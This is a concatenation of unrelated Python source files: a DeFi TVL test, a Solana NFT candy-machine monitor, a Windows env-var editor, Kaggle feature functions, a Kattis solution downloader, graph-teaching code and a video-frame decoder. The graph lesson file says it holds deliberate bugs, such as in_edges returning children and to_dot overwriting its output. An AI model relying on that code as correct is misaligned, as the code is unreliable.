assert round(calculatedTotalTvl) == round(totalTvl)
print("Total tvl", totalTvl)
def test_asset_tvl(earnTvlAdapter, delegationMapping, management):
# delegationMapping.updateDelegationStatusForAsset(
# cyDaiAddress, True, {"from": management}
# )
assetsAddresses = earnTvlAdapter.assetsAddresses()
# for address in assetsAddresses:
# tvl = earnAdapter.assetTvlUsdc(address) / 10 ** 12
# assert tvl > 0
# Print TVL per asset
print("------------------")
print("Earn TVL Breakdown")
print("------------------")
totalTvl = 0
tvlList = []
for address in assetsAddresses:
token = interface.IERC20(address)
print("address", address)
print(earnTvlAdapter.assetTvlBreakdown(address))
print("")
def test_assets_tvl(earnTvlAdapter):
tvl = earnTvlAdapter.assetsTvlBreakdown()
print(tvl)
``` |
{
"source": "0xku5ama/solana_candy_machine_tools",
"score": 3
} |
#### File: solana_candy_machine_tools/solana/candy_machine_stalker.py
```python
import requests
from time import sleep
candy_machines_contract = [
'cndy3Z4yapfJBmL3ShUp5exZKqR3z33thTzeNMm2gRZ']
s = set()
def handle_request(query):
resp = requests.get(query)
if resp.status_code == 200:
return resp.json()
else:
raise Exception('Http request died')
def handle_candy_machine_txn(contract, h):
print(f'Candy machine interaction at {h}')
resp = handle_request(f'https://public-api.solscan.io/transaction/{h}')
try:
for acc in resp['inputAccount']:
if acc['account'] != contract and not acc['signer']:
print(f'Candy machine address: {acc["account"]} on {contract}')
raw = resp['parsedInstruction'][0]['data']
if raw[0] == 'f':
print('Probably updating candy machine')
elif len(raw) > 40: # Likely upload NFT data
raw = raw[40:] # strip headers
end_of_name = raw.find('000000')
if end_of_name == -1:
print(f'Unknown data format, cannot find YY000000 open delimiter, please check txn: {h}')
return
if end_of_name % 2 != 0:
end_of_name += 1
end_of_link = raw.find('000000', end_of_name + 6)
if end_of_link == -1:
print(f'Unknown data format, cannot find XX000000 close delimiter, please check txn: {h}')
return
if end_of_link % 2 != 0:
end_of_link += 1
nft_name = bytearray.fromhex(raw[:end_of_name - 2]).decode()
nft_link = bytearray.fromhex(raw[end_of_name + 6:end_of_link - 2]).decode()
print(f'Name: {nft_name}\nArweave link: {nft_link}')
return
raise Exception('Unknown interaction')
except Exception as e:
print(f'Unknown interaction, please check txn: {h}')
def handle_candy_machine_birth(h):
print(f'New candy machine is born at {h}')
resp = handle_request(f'https://public-api.solscan.io/transaction/{h}')
candy_address = resp['parsedInstruction'][0]['params']['newAccount']
contract = resp['parsedInstruction'][0]['params']['programOwner']
print(f'New candy machine address {candy_address} on {contract}')
def process_txn(txn, contract):
h = txn['txHash']
if h in s:
return
s.add(h)
if len(txn['parsedInstruction']) != 1:
is_mint = False
for instruction in txn['parsedInstruction']:
is_mint = instruction['programId'] == 'TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA'
if is_mint:
# print(f'NFT mint txn on {contract}')
return
if not is_mint:
if txn['parsedInstruction'][0]['type'] == 'createAccount' and txn['parsedInstruction'][1]['programId'] == contract:
handle_candy_machine_birth(h)
else:
handle_candy_machine_txn(contract, h)
print('')
def job():
try:
for contract in candy_machines_contract:
resp = handle_request(f'https://public-api.solscan.io/account/transactions?account={contract}&limit=10')
for txn in resp:
process_txn(txn, contract)
except Exception as e:
print(f'Http request failed due to {e}')
while True:
job()
sleep(5)
``` |
{
"source": "0xLeon/py-winenv-edit",
"score": 3
} |
#### File: py-winenv-edit/winenvedit/__init__.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import sys
import elevate
import winenv
__version__ = '0.0.0'
def prepend_env_var(name, value, env=winenv.ENV_USER, *other):
winenv.append_env_var(name, value, True, ';', env)
def append_env_var(name, value, env=winenv.ENV_USER, *other):
winenv.append_env_var(name, value, False, ';', env)
def set_env_var(name, value, env=winenv.ENV_USER, overwrite=True, *other):
if name.upper() == 'PATH' and overwrite:
raise EnvironmentError('Overwriting the PATH environment variable is not supported. Use the append or prepend action instead.')
if len(value) == 0:
# TODO: implement deletion in winenv
pass
else:
winenv.set_env_var(name, value, overwrite=overwrite, env=env)
def main(argv=None):
actions = {
'set': set_env_var,
'prepend': prepend_env_var,
'append': append_env_var,
}
envs = [winenv.ENV_USER, winenv.ENV_SYSTEM]
p = argparse.ArgumentParser()
p.add_argument('action', choices=['set', 'prepend', 'append'], metavar='action')
p.add_argument('-m', '--system', action='store_true', dest='system')
p.add_argument('-f', '--force', action='store_true', dest='overwrite')
p.add_argument('vars', nargs='+', metavar='name=[value]')
args = p.parse_args(argv)
if not args.system or elevate.elevate():
for var in args.vars:
if '=' not in var:
print('Skipping invalid var {}'.format(var), file=sys.stderr)
continue
name, value = var.split('=', 1)
actions[args.action](name, value, envs[int(args.system)], args.overwrite)
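# Example invocations (hypothetical command name and values; assumes the package
# exposes an entry point that calls main()):
#   winenv-edit set MY_VAR=hello
#   winenv-edit append -m PATH=C:\Tools      # -m targets the system environment (needs elevation)
#   winenv-edit set -f MY_VAR=overwritten    # -f allows overwriting an existing variable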
``` |
{
"source": "0xleowang/Kaggle-Optiver-Solution",
"score": 2
} |
#### File: 0xleowang/Kaggle-Optiver-Solution/numba_functions.py
```python
import numpy as np
from numba import njit
# numba
@njit
def calc_wap_njit(bp1, ap1, bs1, as1):
return (bp1 * as1 + ap1 * bs1) / (bs1 + as1)
@njit
def prod_njit(a, b):
return np.multiply(a, b)
@njit
def rv_njit(values):
return np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
@njit
def sum_njit(a):
return np.sum(a)
@njit
def mean_njit(values):
return np.mean(values) if len(values) > 0 else 0
@njit
def mean_abs_njit(values):
return np.mean(np.abs(values)) if len(values) > 0 else 0
@njit
def std_njit(values):
return np.std(values) if len(values) > 0 else 0
@njit
def skew_njit(values):
# numpy has no skew function; compute the (biased) sample skewness manually
if len(values) == 0:
return 0
mu = np.mean(values)
sigma = np.std(values)
return np.mean((values - mu) ** 3) / sigma ** 3 if sigma > 0 else 0
@njit
def min_njit(values):
return np.min(values) if len(values) > 0 else 0
@njit
def max_njit(values):
return np.max(values) if len(values) > 0 else 0
@njit
def q1_njit(values):
return np.quantile(values, q=0.25) if len(values) > 0 else 0
@njit
def q2_njit(values):
return np.quantile(values, q=0.50) if len(values) > 0 else 0
@njit
def q3_njit(values):
return np.quantile(values, q=0.75) if len(values) > 0 else 0
# for pandas
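# The (values, index) signature below matches what pandas expects from user-defined
# aggregation functions when engine="numba" is used (e.g. in GroupBy.agg); the index
# argument is required by that interface even when it is unused.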
def rv_numba(values, index):
return np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
def rvp_numba(values, index):
return np.sqrt(np.sum(np.square(np.maximum(values, 0)))) if len(values) > 0 else 0
def rvn_numba(values, index):
return np.sqrt(np.sum(np.square(np.minimum(values, 0)))) if len(values) > 0 else 0
def bpv_numba(values, index):
mu1_sq = 2 / np.pi
return 1 / mu1_sq * np.sqrt(np.sum(np.abs(values[1:] * values[:-1]))) if len(values) > 1 else 0
def jv_numba(values, index):
mu1_sq = 2 / np.pi
rv = np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
bpv = 1 / mu1_sq * np.sqrt(np.sum(np.abs(values[1:] * values[:-1]))) if len(values) > 1 else 0
return max(rv - bpv, 0)
def rq_numba(values, index):
scaler = len(values) / 3
return np.sqrt(np.sqrt(scaler * np.sum(np.power(values, 4)))) if len(values) > 0 else 0
def count_numba(values, index):
return len(values)
def sqrt_inv_count_numba(values, index):
return np.sqrt(1 / (1 + len(values)))
def sum_numba(values, index):
return np.sum(values) if len(values) > 0 else 0
def sqrt_inv_sum_numba(values, index):
return np.sqrt(1 / (1 + np.sum(values))) if len(values) > 0 else 0
def mean_numba(values, index):
return np.mean(values) if len(values) > 0 else 0
def mean_abs_numba(values, index):
return np.mean(np.abs(values)) if len(values) > 0 else 0
def std_numba(values, index):
return np.std(values) if len(values) > 0 else 0
def skew_numba(values, index):
# numpy has no skew function; compute the (biased) sample skewness manually
if len(values) == 0:
return 0
mu = np.mean(values)
sigma = np.std(values)
return np.mean((values - mu) ** 3) / sigma ** 3 if sigma > 0 else 0
def min_numba(values, index):
return np.min(values) if len(values) > 0 else 0
def max_numba(values, index):
return np.max(values) if len(values) > 0 else 0
def q1_numba(values, index):
return np.quantile(values, q=0.25) if len(values) > 0 else 0
def q2_numba(values, index):
return np.quantile(values, q=0.50) if len(values) > 0 else 0
def q3_numba(values, index):
return np.quantile(values, q=0.75) if len(values) > 0 else 0
def ptp_numba(values, index):
return np.ptp(values) if len(values) > 0 else 0
def last_numba(values, index):
return values[-1] if len(values) > 0 else 0
def sum_sq_numba(values, index):
return np.sum(np.square(values)) if len(values) > 0 else 0
def iqr_numba(values, index):
return np.percentile(values, 75) - np.percentile(values, 25) if len(values) > 0 else 0
``` |
{
"source": "0xlimE/Kattis-Download-Helper",
"score": 3
} |
#### File: 0xlimE/Kattis-Download-Helper/Kattisdownloader.py
```python
import requests
import zipfile
from io import BytesIO
from bs4 import BeautifulSoup
import os
import shutil
baseurl = "https://open.kattis.com/"
cookies = {'EduSiteCookie': '**INSERT COOKIE HERE****'}
username = "***INSERT USERNAME HERE***"
assignments = set()
def splitRow(row):
cells = row.findChildren('td')
returnlist = []
for cell in cells:
returnlist.append(cell.getText())
return returnlist
def getAcceptedOnSite(url):
get = requests.get(url,cookies=cookies)
soup = BeautifulSoup(get.content, 'html.parser')
table = soup.findChildren('table')
rows = table[1].findChildren(['tr'])
returnlist = []
for row in rows[1:]:
listRow = splitRow(row)
if((listRow[2] not in assignments) and (listRow[3] == "Accepted")):
assignments.add(listRow[2])
returnlist.append(listRow)
return returnlist
def getAllAccepted(username):
toDownload = []
for i in range(5000): #Assume no one has more than 5000 pages
print("indexing page "+str(i))
url = baseurl+"users/"+username+"?page="+str(i)
resultFromPage = getAcceptedOnSite(url)
if(len(resultFromPage) == 0):
return toDownload
toDownload = toDownload + resultFromPage
def downloadContents(id,folder):
try:
os.mkdir(folder)
except FileExistsError:
print("Directory " , folder , " already exists,skipping")
return
url = baseurl+"submissions/"+str(id)+"/source"
request = requests.get(url,cookies=cookies)
zip_file = zipfile.ZipFile(BytesIO(request.content))
for zip_info in zip_file.infolist():
if zip_info.filename[-1] == '/':
continue
zip_info.filename = os.path.basename(zip_info.filename)
zip_file.extract(zip_info,os.getcwd()+"/"+folder)
done = getAllAccepted(username)
for d in done:
print("Downloading "+d[2])
downloadContents(int(d[0]),d[2])
print("Finished!")
``` |
{
"source": "0xLiso/DeepLearningFromScratch",
"score": 4
} |
#### File: python/Lesson01/lesson01.py
```python
from collections import deque
import unittest
"""
Ejemplo de solución para el primer post.
RECORDAD QUE CONTINE ERRORES INTENCIONADOS PARA EVITAR EL C&P
First post solutions,
REMEMBER, IT HAS SOME INTENTIONAL BUGS TO AVOID C&P
"""
class node():
name = ""
def __init__(self, name):
self.name = name
self.parent_nodes = []
self.child_nodes = []
def __str__(self):
return str(self.name)
def add_child(self, j: str):
if j not in self.child_nodes:
self.child_nodes.append(j)
def add_parent(self, j: str):
if j not in self.parent_nodes:
self.parent_nodes.append(j)
def has_child(self, j: str):
return j in self.child_nodes
def remove_child(self, j: str):
self.child_nodes.remove(j)
def remove_parent(self, j: str):
self.parent_nodes.remove(j)
class graph():
nodes = {}
def __init__(self):
self.nodes = {}
def __exist_node__(self, i: str):
if i not in self.nodes:
raise ValueError(f"node {i} don't exist.")
def add_node(self, node_i: node):
if str(node_i) not in self.nodes:
self.nodes[str(node_i)] = node_i
def add_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
self.nodes[i].add_child(j)
self.nodes[j].add_parent(i)
def remove_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
self.nodes[i].remove_child(j)
self.nodes[j].remove_parent(i)
def has_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
return self.nodes[i].has_child(j)
def out_edges(self, i: str):
return self.nodes[i].child_nodes
def in_edges(self, i: str):
return self.nodes[i].child_nodes
def to_dot(self):
base = "digraph G {"
sout = base + "\n"
for n in self.nodes:
for c in self.nodes[n].child_nodes:
sout = n + "->" + c + "\n"
sout += "}"
return sout
def dfs(self, i: str):
# Depth-first search (DFS)
S = [] # remember, this is a LIFO container (a stack)
visited = []
S.append(i) # push the starting node onto the stack
while len(S) > 0:
v = S.pop()
visited.append(self.nodes[v])
for w in self.nodes[v].child_nodes:
if w not in visited:
S.append(w)
return visited # return the list of nodes in the correct depth-first order
def bfs(self, i: str):
# Breadth-first search (BFS)
Q = deque([]) # remember, this is a FIFO container (a queue)
visited = []
Q.append(i) # enqueue the starting node
while len(Q) > 0:
v = Q.popleft()
visited.append(self.nodes[v])
for w in self.nodes[v].child_nodes:
if w not in visited:
Q.append(w)
return visited # return the list of nodes in breadth-first order
def reverse_bfs(self, i: str):
raise NotImplementedError
def is_DAG(self):
# DFS over ancestors from every node, looking for a node that is reached twice
for i in self.nodes:
S = [] # remember, this is a LIFO container (a stack)
visited = []
S.append(i) # push the starting node onto the stack
while len(S) > 0:
v = S.pop()
if v in visited:
return False
visited.append(v)
for w in self.nodes[v].parent_nodes:
if w not in visited:
S.append(w)
return True # no node was reached twice, so the graph is a DAG
class TestGraphMethods(unittest.TestCase):
def setup(self):
g = graph()
g.add_node(node("node_a"))
g.add_node(node("node_b"))
g.add_node(node("node_c"))
g.add_node(node("node_d"))
g.add_node(node("node_e"))
g.add_node(node("node_f"))
return g
def test_to_dot(self):
g = graph()
g.add_node(node("node_a"))
g.add_node(node("node_b"))
g.add_node(node("node_c"))
g.add_node(node("node_d"))
g.add_node(node("node_e"))
g.add_node(node("node_f"))
g.add_edge("node_a", "node_c")
g.add_edge("node_b", "node_d")
g.add_edge("node_c", "node_d")
g.add_edge("node_d", "node_f")
g.add_edge("node_e", "node_f")
result = '''digraph G {
node_a -> node_c
node_b -> node_d
node_c -> node_d
node_d -> node_f
node_e -> node_f
}'''
self.assertTrue(
g.to_dot().replace(' ', '').replace('\t', '').replace('\n', '') ==
result.replace(' ', '').replace('\t', '').replace('\n', ''))
def test_has_edge(self):
# Test graph manipulation
g = self.setup()
g.add_edge("node_a", "node_c")
g.add_edge("node_b", "node_d")
g.add_edge("node_c", "node_d")
g.add_edge("node_d", "node_f")
g.add_edge("node_e", "node_f")
# Test the has_edge function
self.assertFalse(g.has_edge("node_a", "node_b"))
self.assertTrue(g.has_edge("node_b", "node_d"))
# Test remove edge
g.remove_edge("node_b", "node_d")
self.assertFalse(g.has_edge("node_b", "node_d"))
def test_dfs(self):
# Test graph manipulation
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
# the order in which the edges are added matters for the solution to match exactly;
# adding them in a different order gives a different but equally correct result.
g.add_edge("node_j", "node_h")
g.add_edge("node_i", "node_h")
g.add_edge("node_h", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_e", "node_c")
g.add_edge("node_d", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
# Test DFS
resultado = g.dfs("node_a")
self.assertTrue(resultado == [g.nodes["node_a"], g.nodes["node_b"], g.nodes["node_c"], g.nodes["node_d"],
g.nodes["node_e"], g.nodes["node_f"], g.nodes["node_g"], g.nodes["node_h"],
g.nodes["node_i"], g.nodes["node_j"]])
def test_bfs(self):
# Test graph manipulation
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test BFS
resultado = g.bfs("node_a")
self.assertTrue([str(x) for x in resultado] == ["node_a", "node_b", "node_g", "node_h",
"node_c", "node_f", "node_i", "node_j",
"node_d", "node_e"])
def test_reverse_bfs(self):
# Test graph manipulation
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test reverse BFS
resultado = g.reverse_bfs("node_a")
self.assertTrue([str(x) for x in resultado] == ["node_e", "node_d", "node_j", "node_i",
"node_f", "node_c", "node_h", "node_g",
"node_b", "node_a"])
def test_is_dag(self):
# Test graph manipulation
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test is DAG
self.assertTrue(g.is_DAG())
g2 = graph()
g2.add_node(node("node_1"))
g2.add_node(node("node_2"))
g2.add_node(node("node_3"))
g2.add_edge("node_1", "node_3")
g2.add_edge("node_2", "node_3")
g2.add_edge("node_3", "node_2")
# Test is DAG
self.assertFalse(g2.is_DAG())
if __name__ == '__main__':
unittest.main()
```
#### File: python/Lesson04/compgraph.py
```python
from graph import Graph,Node
#import all operations
from tensor import Tensor
from variable import Variable
from placeholder import Placeholder
from operations import *
class Compgraph(object):
name = "unnamed"
graph = None
nvariables = 0
nplaceholders = 0
nops = 0
def __init__(self,name:str="anonymous"):
self.name = name
if not self.graph:
self.graph=Graph()
def to_dot(self):
return self.graph.to_dot()
def add_operation(self,op:Operation):
if not op.name:
op.set_name("{}_{}".format(op.base_name,self.nops))
self.graph.add_node(op)
self.nops+=1
for input in op.inputs :
self.graph.add_edge(input,op)
return op
def add_placeholder(self,ph:Placeholder) -> Placeholder:
if not ph.name:
ph.set_name("Placeholder_{}".format(self.nplaceholders))
self.graph.add_node(ph)
self.nplaceholders += 1
return ph
def add_variable(self,v:Variable) -> Variable:
if not v.name:
v.set_name("Variable_{}".format(self.nvariables))
self.graph.add_node(v)
self.nvariables += 1
return v
def run(self,toNode:Node) -> Tensor:
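# Evaluate nodes in reverse-BFS order from the requested node so that (assuming the
# graph is a DAG and reverse_bfs yields dependencies before dependents) every node's
# inputs are already computed when its forward() runs.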
order = self.graph.reverse_bfs(toNode)
for node in order:
node.forward()
return toNode.output
``` |
{
"source": "0xLiso/dePIXELator",
"score": 3
} |
#### File: 0xLiso/dePIXELator/export_film.py
```python
import os
import struct
import subprocess
from copy import copy
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
class Chunk:
__header_size = 8
header = None
data_position = -1
fd = None
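    # Header layout (8 bytes, parsed in __init__ below): bytes 0-1 hold the
    # little-endian data size, byte 3 the chunk type, bytes 4-5 the frame
    # number, and bytes 6-7 must be the 0x60 0xC0 end-of-header marker.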
def __init__(self, file):
initial_pos = file.tell()
self.header = file.read(self.__header_size)
if not self.header:
raise EOFError("EOF reached")
if self.header[6] != 0x60 or self.header[7] != 0xC0:
file.seek(initial_pos, 0)
raise LookupError("Chunk Header should end with 0x60c0")
self.data_size = (self.header[1] * 256) + self.header[0]
self.nframe = self.header[5] * 0xFF + self.header[4]
self.type = self.header[3]
self.data_position = file.tell()
file.seek(self.data_size, 1)
self.fd = file
def get_data(self):
initial_pos = self.fd.tell()
self.fd.seek(self.data_position, 0)
result = self.fd.read(self.data_size)
self.fd.seek(initial_pos, 0)
return result
def get_type(self):
for i, b in enumerate(self.header):
if i == 3:
if b == 0:
return "💣" # ¿Es un clear?
elif b == 2:
return "🎨" # Paleta
elif b == 3:
return "🖼️" # Keyframe
elif b == 4:
return "🗝️" # Frame diferencias tipo 1
elif b == 5:
return "🎬" # Frame diferencias tipo 2
elif b == 6:
return "🎞️" # ¿Frame diferencias tipo 3?
elif b == 7:
return "🎵" # Audio
elif b == 9:
return "🏂" # ¿Esto es un salto?
elif b == 11:
return "📼" # ¿Frame diferencias tipo 4?
elif b == 12:
return "❓" # Ni idea, no parece video
elif b == 13:
return "❗" # Ni idea, no parece video
elif b == 14:
return "💲" # Ni idea, no parece video
return "💩"
class VIPFile:
fd = None
filename = ""
chunks = []
initial_offset = 0x20
def __init__(self, filename, initial_offset=0x20, max_chunks=-1):
self.filename = filename
self.fd = open(filename, "rb")
self.initial_offset = initial_offset
self.max_chunks = max_chunks
self.video_height = 0x8C
self.video_width = 0xE4
self.analyze_vip_file()
self.frame = [0] * self.video_width * self.video_height
self.masks = (
(0, 0, 0, 0),
(1, 0, 0, 0),
(0, 1, 0, 0),
(1, 1, 0, 0),
(0, 0, 1, 0),
(1, 0, 1, 0),
(0, 1, 1, 0),
(1, 1, 1, 0),
(0, 0, 0, 1),
(1, 0, 0, 1),
(0, 1, 0, 1),
(1, 1, 0, 1),
(0, 0, 1, 1),
(1, 0, 1, 1),
(0, 1, 1, 1),
(1, 1, 1, 1),
)
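        # Note: self.masks above expands a 4-bit mask value into four 0/1
        # indices, one per pixel of a 4-pixel run; bit n of the mask selects
        # colors[1] for pixel n, otherwise colors[0] (see draw_frame_type0b).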
def __del__(self):
if self.fd:
self.fd.close()
def analyze_vip_file(self):
self.fd.seek(self.initial_offset, 0)
while True:
try:
tmp_chunk = Chunk(self.fd)
self.chunks.append(tmp_chunk)
if 0 < self.max_chunks < len(self.chunks):
break
except EOFError as e:
print(f"EOF with {len(self.chunks)}")
break
except Exception as e:
print(e)
raise e
def get_chunk(self, chunk_id):
return list(self.chunks[chunk_id].get_data())
def show_info(self, init=0, end=-1, filter_by=[]):
if end < 0:
end = len(self.chunks)
for count, bh in enumerate(self.chunks[init:end]):
h = bh.header
endset = "💩💩💩💩💩💩💩💩💩💩💩"
size = bh.data_size
text = ""
endset = bh.get_type()
for i, b in enumerate(h):
text += f"{b:02x} "
if endset in filter_by or len(filter_by) == 0:
print(f"{count + init:06}: [{size:>6}]", end=" ")
print(f"{text} {endset}", end=" ")
if endset == "📼":
r = self.get_chunk(count + init)
print(f" ->{r[0]}", end=" ")
print("")
def show_info_acc(self, init=0, end=-1, filter_by=[]):
res = []
if end < 0:
end = len(self.chunks)
for count, bh in enumerate(self.chunks[init:end]):
h = bh.header
for i, b in enumerate(h):
if i == 3:
if b == 5:
res.append(count + init)
return res
def draw_palette(self, id):
palette = self.get_palette(id)
colors = [x for x in range(len(palette))]
while len(colors) < 256:
colors.append(0)
palette_matrix = np.array(palette, dtype="uint8")
indices = np.array(colors)
plt.imshow(palette_matrix[indices].reshape((16, 16, 3)))
def get_palette(self, palette_id):
raw = self.get_chunk(palette_id)
palette = [(0, 0, 0)]
i = 2
while True:
try:
                r, g, b = raw[i : i + 3] # read RGB
i += 3
palette.append((r * 4, g * 4, b * 4))
except Exception as e:
break
return palette
def go_to_line(self, byte_list, initial_position=0xC8A):
"""Se supone que son 4 bytes.
en el ejemplo viene como 0x00040044 y nos da un
salto a: 0x618a
Nos llegaran como 44 00 04 00 hay que pasarlo a LSB 0x00040044"""
ax = struct.unpack("<H", bytearray(byte_list))
return initial_position + ax[0] * 228
# %%
def draw_frame_type03(self, frame_id):
""" Los frames de tipo 3 tienen todos 31920 pixeles, asi que se pintan y ya esta """
res = []
kdata = self.get_chunk(frame_id)
for color in kdata:
res += [color]
return res
def draw_frame_type0b(self, frame_id, last_frameb):
kdata = self.get_chunk(frame_id)
last_frame = list(last_frameb)
pos = 0
vga_pos = 0
if kdata[pos] == 0:
pos += 1
while pos < len(kdata):
colors = kdata[pos : pos + 2]
pos += 2
mask = kdata[pos]
pos += 1
color = [colors[i] for i in self.masks[mask & 0x0F]]
color2 = [colors[i] for i in self.masks[(mask & 0xF0) >> 4]]
last_frame[vga_pos : vga_pos + 4] = color
last_frame[vga_pos + 228 : vga_pos + 228 + 4] = color2
vga_pos += 4
if vga_pos % 228 == 0:
vga_pos += 228
else:
data_pos = 0x1F3 + 1
bitmap_pos = 1
vga_pos = 0
nbits = 0
while bitmap_pos < 0x1F3 + 1:
current_bitmap = kdata[bitmap_pos]
bitmap_pos += 1
# print(hex(current_bitmap))
for bit in format(current_bitmap, "#010b")[2:]:
if bit == "1":
nbits += 1
colors = kdata[data_pos : data_pos + 2]
data_pos += 2
mask = kdata[data_pos]
data_pos += 1
color = [colors[i] for i in self.masks[mask & 0x0F]]
color2 = [
colors[i] for i in self.masks[(mask & 0xF0) >> 4]
]
last_frame[vga_pos : vga_pos + 4] = color
last_frame[vga_pos + 228 : vga_pos + 228 + 4] = color2
vga_pos += 4
if vga_pos % 228 == 0:
vga_pos += 228
# print(hex(data_pos))
# print(nbits)
return last_frame
def draw_frame_type04(self, frame_id, frame):
last_frame = frame
kdata = self.get_chunk(frame_id)
next_line = 0xE4
current_line = 0
pos = 0
draw_address = 0
while pos < len(kdata):
draw_type = kdata[pos]
pos += 1
repetitions = draw_type & 0x7F
repetitions += 1
# print(f'\t\tS:{desp_linea} T:{cuantas_veces}')
if draw_type < 0x80:
for _ in range(repetitions):
color = kdata[pos]
pos += 1
# print(f'\t\t\tPA:{hex(color)}')
last_frame[draw_address] = color
draw_address += 1
else:
                # MSB == 1, i.e. the byte is >= 0x80
color = kdata[pos]
pos += 1
# print(f'\t\t\tP:{hex(color)}')
for _ in range(repetitions):
last_frame[draw_address] = color
draw_address += 1
return last_frame # 31920
def draw_frame_type05(self, diff_id, last_frame):
next_line = 0xE4
try:
kdata = list(self.chunks[diff_id].get_data())
            # skip the first 2 bytes
pos = 2
num_parts = kdata[pos]
pos += 2
current_line = 0
while num_parts != 0:
current_line += self.go_to_line(
kdata[pos : pos + 2], 0
                ) # initial line offset
pos += 2
num_lines = kdata[pos]
# print(f'L:{num_lineas}')
pos += 2
while num_lines != 0:
num_commands = kdata[pos]
# print(f'\tC:{num_commands}')
pos += 1
draw_address = current_line
while num_commands != 0:
draw_address += kdata[pos]
pos += 1
draw_type = kdata[pos]
pos += 1
repetitions = draw_type & 0x7F
repetitions += 1
# print(f'\t\tS:{desp_linea} T:{cuantas_veces}')
if draw_type < 0x80:
for _ in range(repetitions):
color = kdata[pos]
pos += 1
# print(f'\t\t\tPA:{hex(color)}')
last_frame[draw_address] = color
draw_address += 1
else:
color = kdata[pos]
pos += 1
# print(f'\t\t\tP:{hex(color)}')
for _ in range(repetitions):
last_frame[draw_address] = color
draw_address += 1
num_commands -= 1
num_lines -= 1
current_line += next_line
num_parts -= 1
except Exception as e:
print(f"Exception!!!!!! en frame id: {diff_id}")
return last_frame
def apply_palette(self, palette, img):
try:
pal = np.array(palette, dtype="uint8")
indices = np.array(img, dtype="uint8")
return pal[indices].reshape((self.video_height, self.video_width, 3))
except Exception as e:
print(f"Error {e}")
def __iter__(self):
self.iter_index = 0
self.current_palette = None
self.frame = [0 for x in range(self.video_width * self.video_height)]
return self
def __next__(self):
if self.iter_index <= self.max_chunks:
chunk = self.chunks[self.iter_index]
chunk_type = chunk.get_type()
while chunk_type in ["🎵", "🎨"]:
if chunk_type == "🎨":
self.current_palette = self.get_palette(self.iter_index)
self.iter_index += 1
if self.iter_index >= len(self.chunks):
raise StopIteration
chunk = self.chunks[self.iter_index]
chunk_type = chunk.get_type()
if chunk_type == "💣": # 0x00
                self.frame = [1] * 228 * 140
elif chunk_type in ["🖼️"]: # 0x03
self.frame = self.draw_frame_type03(self.iter_index)
elif chunk_type in ["🗝️"]: # 0x04
self.frame = self.draw_frame_type04(self.iter_index, self.frame)
elif chunk_type == "🎬": # 0x05
self.frame = self.draw_frame_type05(self.iter_index, self.frame)
elif chunk_type == "🎞️": # 0x06
print(f"tipo 0x06 -> {self.iter_index}")
self.frame = [0] * self.video_width * self.video_height
elif chunk_type == "🏂": # 0x09
print(f"tipo 0x09 -> {self.iter_index}")
pass # Esto se supone que es salto y no hace nada
elif chunk_type == "📼": # 0x11
self.frame = self.draw_frame_type0b(self.iter_index, self.frame)
elif chunk_type == "❓": # 0x12
print(f"tipo 0x12 -> {self.iter_index}")
pass # No se que es pero no creo que sea video
elif chunk_type == "❗": # 0x13
print(f"tipo 0x13 -> {self.iter_index}")
pass # No se que es pero no creo que sea video
elif chunk_type == "💲": # 0x14
#print(f"tipo 0x14 -> {self.iter_index}")
pass # espera N frames que son para solo audio.
#ToDo: hacer que devuelva N frames distintos.
if self.frame is None:
raise Exception(f"tipo {chunk_type}, {self.iter_index}")
self.iter_index += 1
if chunk_type in ["🎞️"]: # Nos faltan 2 tipos de frame
dirty_pal = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 0, 255)]
return self.apply_palette(dirty_pal, self.frame), self.iter_index
return self.apply_palette(self.current_palette, self.frame), self.iter_index
else:
raise StopIteration
def __getitem__(self, item):
items = []
if isinstance(item, int):
start, stop = item, item + 1
else:
start = item.start if item.start is not None else 0
stop = item.stop if item.stop is not None else len(self.chunks)
for i, frame in enumerate(self):
if i == stop:
break
if i >= start:
items.append(frame)
return items
if __name__ == "__main__":
# v = VIPFile("/home/liso/notebooks/DL/Zorton/data/game/iso/SN00002.VIP", 0x0DF5B6A0, 10000)
v = VIPFile("./SN00002.VIP", 0x20, 100000)
i = 0
for frame,nframe in tqdm(v):
plt.imsave(f"frames/frame{nframe:08}.png", frame)
i+=1
os.chdir("frames")
"""subprocess.call(
[
"ffmpeg",
"-i",
"frame%d.png",
"-r",
"25",
"-c:v",
"libx264",
"video.mp4",
]
